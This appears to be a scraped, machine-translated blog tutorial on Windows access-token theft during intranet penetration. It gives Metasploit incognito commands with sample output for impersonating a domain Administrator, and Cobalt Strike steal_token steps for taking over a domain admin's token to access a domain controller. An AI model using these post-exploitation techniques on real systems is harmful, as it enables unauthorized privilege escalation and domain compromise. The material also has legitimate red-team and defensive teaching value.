当前位置:网站首页>Intranet penetration token stealing
Intranet penetration token stealing
2022-06-23 17:06:00 【West Lake first sword】
token
A token is an object that describes a process or thread security context .
After different users log on to the computer , Will generate a Access Token, This Token It is used when the user creates a process or thread ,
Keep copying , That explains A The user creates a process that does not B User's rights . Generally, users double-click to run a process will copy explorer.exe Of Access Toke
Access tokens are divided into :
authorization token (Delegation token): Interactive session login ( example : Local users log in 、 User desktop, etc )
Impersonate token (Impersonation token): Non interactive login ( example :net use Access shared files )
Two kinds of token It will be cleared only after the system is restarted ; Authorization token in ⽤ After account cancellation , The token becomes an analog token and is still valid .
Metasploit Token theft
This tool needs to be authorized as system Permission to view all token
# Load module
use incognito
# List token
list_tokens -u
# steal token
impersonate_token 'AA\Administrator'
meterpreter > impersonate_token 'AA\Administrator'
[+] Delegation token available
[+] Successfully impersonated user AA\Administrator
meterpreter > getuid
Server username: AA\Administrator
After executing the order , Return to the previous... With the following command token
rev2self
## or
drop_token
Cobalt strike Stealing domain administrator token in actual combat
The right is system after , Check the process , It is found that Firefox is running as a domain administrator , To steal .
beacon> steal_token 1260 Stealing tokens
beacon> rev2self Recovery token 
After success , Access to domain control succeeded This is equivalent to raising the permission to the domain administrator
dir\172.16.2.2\c$
边栏推荐
- 聚焦:ZK-SNARK 技术
- Image saving: torchvision utils. save_ image(img, imgPath)
- Jmeter压力测试教程
- Digital twin excavator of Tupu software realizes remote control
- 你女朋友也能读懂的LAMP架构
- 使用Jmeter进行性能测试及性能监控平台搭建
- ABAP随笔-物料主数据界面增强
- 接口的所有权之争
- Tupu digital twin 3D wind farm, offshore wind power of smart wind power
- 供求两端的对接将不再是依靠互联网时代的平台和中心来实现的
猜你喜欢

Rongyun: let the bank go to the "cloud" easily

亚朵更新招股书:继续推进纳斯达克上市,已提前“套现”2060万元

【网络通信 -- WebRTC】WebRTC 源码分析 -- PacingController 相关知识点补充

Golang data type diagram

图扑软件以轻量化建模构建智慧城市

NPM install problem solving (NVM installation and use)
![Leetcode: interview question 08.13 Stacking bin [top-down DFS + memory or bottom-up sorting + DP]](/img/22/220e802da7543c2b14b7057e4458b7.png)
Leetcode: interview question 08.13 Stacking bin [top-down DFS + memory or bottom-up sorting + DP]

DataNode进入Stale状态问题排查

Tupu software builds smart city with lightweight modeling

Mathematical analysis_ Certification_ Chapter 1: the union of countable sets is countable
随机推荐
[untitled] Application of laser welding in medical treatment
What does websocket do?
ABAP随笔-程序优化笔记
JS common error reporting and exception capture
The official Chinese course of zero foundation introduction jetpack compose is coming
手机开户股票开户需要多久?在线开户安全么?
What can the accelerated implementation of digital economy bring to SMEs?
stylegan2:analyzing and improving the image quality of stylegan
三分钟学会如何找回mysql密码
开户券商怎么选择?现在网上开户安全么?
leetcode:30. 串联所有单词的子串【Counter匹配 + 剪枝】
What are the inductance parameters? How to choose inductance?
How can the points mall make profits
R language uses the image of magick package_ The scale function resizes the image. You can customize the scaling from the angle of width or height
Robot Orientation and some misunderstandings in major selection in college entrance examination
ABP framework - data access infrastructure (Part 2)
ADC digital DGND, analog agnd mystery!
电感参数有哪些?怎么选择电感?
leetcode:面試題 08.13. 堆箱子【自頂而下的dfs + memory or 自底而上的排序 + dp】
记录——kubeadm集群node节点加入